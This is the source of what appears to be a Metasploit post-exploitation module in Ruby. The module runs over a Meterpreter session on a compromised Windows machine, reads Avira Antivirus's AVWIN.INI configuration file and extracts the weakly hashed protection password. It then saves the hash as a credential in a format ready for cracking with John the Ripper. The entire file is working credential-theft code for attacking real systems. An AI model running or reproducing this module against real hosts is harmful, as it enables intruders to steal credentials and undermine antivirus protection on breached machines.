78 lines
2.2 KiB
Ruby
78 lines
2.2 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Post
|
|
include Msf::Post::Windows::Registry
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'Windows Gather Avira Password Extraction',
|
|
'Description' => %q{
|
|
This module extracts the weakly hashed password
|
|
which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'Robert Kugler / robertchrk'],
|
|
'Platform' => [ 'win' ],
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
'Compat' => {
|
|
'Meterpreter' => {
|
|
'Commands' => %w[
|
|
core_channel_eof
|
|
core_channel_open
|
|
core_channel_read
|
|
core_channel_write
|
|
stdapi_fs_stat
|
|
]
|
|
}
|
|
}
|
|
)
|
|
)
|
|
end
|
|
|
|
def run
|
|
print_status('Checking default location...')
|
|
check_programdata('C:\\ProgramData\\Avira\\Antivirus\\CONFIG\\AVWIN.INI')
|
|
end
|
|
|
|
def check_programdata(path)
|
|
client.fs.file.stat(path)
|
|
print_status("Found file at #{path}")
|
|
get_ini(path)
|
|
rescue StandardError
|
|
print_error("Error reading or processing #{path}.")
|
|
end
|
|
|
|
def get_ini(filename)
|
|
config = client.fs.file.new(filename, 'r')
|
|
parse = Rex::Text.to_ascii(config.read)
|
|
ini = Rex::Parser::Ini.from_s(parse)
|
|
|
|
if ini == {}
|
|
print_error('Unable to parse file')
|
|
return
|
|
end
|
|
|
|
print_status('Processing configuration file...')
|
|
passwd = ini['COMMON']['Password']
|
|
passwd = passwd.delete '"'
|
|
create_credential({
|
|
workspace_id: myworkspace_id,
|
|
origin_type: :session,
|
|
session_id: session_db_id,
|
|
post_reference_name: refname,
|
|
private_type: :nonreplayable_hash,
|
|
jtr_format: 'Raw-MD5u', # hard coded since hash identifier wont know its unicode
|
|
private_data: passwd,
|
|
service_name: 'Avira Antivirus',
|
|
status: Metasploit::Model::Login::Status::UNTRIED
|
|
})
|
|
print_good("MD5(Unicode) hash found: #{passwd}")
|
|
print_good('Info: Password length is limited to 20 characters.')
|
|
end
|
|
end
|